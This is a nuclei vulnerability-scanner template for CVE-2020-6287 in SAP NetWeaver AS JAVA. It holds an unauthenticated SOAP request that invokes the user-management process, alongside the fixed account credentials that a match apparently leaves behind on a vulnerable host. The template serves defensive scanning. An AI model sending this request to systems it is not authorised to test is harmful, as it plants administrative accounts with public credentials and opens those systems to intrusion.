nuclei-templates/http/cves/2020/CVE-2020-6287.yaml

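# Detection template for CVE-2020-6287: the LM Configuration Wizard endpoint
# (CTCWebService ConfigServlet) on SAP NetWeaver AS JAVA accepts configuration
# tasks without an authentication check.
id: CVE-2020-6287

info:
  name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition
  author: dwisiswant0
  severity: critical
  description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system.
  remediation: |
    Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability.
  reference:
    - https://launchpad.support.sap.com/#/notes/2934135
    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
    - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
    - https://github.com/chipik/SAP_RECON
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6287
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2020-6287
    cwe-id: CWE-306
    epss-score: 0.97274
    epss-percentile: 0.99828
    cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: netweaver_application_server_java
    shodan-query: http.favicon.hash:-266008933
  # "intrusive" is added because a successful run changes state on the target
  # (see the note on the request below); scans that exclude intrusive
  # templates will then skip this one.
  tags: cve,cve2020,sap,kev,intrusive

# NOTE(review): this is not a passive check. The SOAP call invokes the
# SPC_UserManagement process, and the trailing comments record a fixed
# userName/password for it, so on a vulnerable host a match presumably leaves
# an account with those publicly known credentials behind. After a match,
# remove that account and review what it was used for. An occurrence of that
# user name on a system nobody scanned is worth investigating.
# The <baData> content is not present on this page; the marker line inside the
# request is reproduced exactly as the page shows it.
http:
  - raw:
      - |
        POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
        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
        </baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>

    # All three matchers must hold. Together they show that the endpoint
    # answered the unauthenticated request with a SOAP response; none of them
    # checks whether the user-management task itself completed.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CTCWebServiceSi"
          - "SOAP-ENV"
        condition: and

      # No "condition" key here, so either word alone satisfies this matcher
      # (nuclei's default for a word list is "or").
      - type: word
        part: header
        words:
          - "text/xml"
          - "SAP NetWeaver Application Server"

      - type: status
        status:
          - 200
# NOTE(review): the digest on the last line is a signature over the template as
# published. It will not verify against an edited file, so the template has to
# be re-signed after any change.
# userName - sapRpoc6351
# password - Secure!PwD8890
# digest: 4b0a00483046022100b19a292d073707c2a62a60266109e8184180be7aac276b0ece9e1f5ab05a11f8022100a41ce09247707ac7505935a8526cd615a99b19a858609d205e04fb959598ec6a:922c64590222798bb761d5b6d8e72950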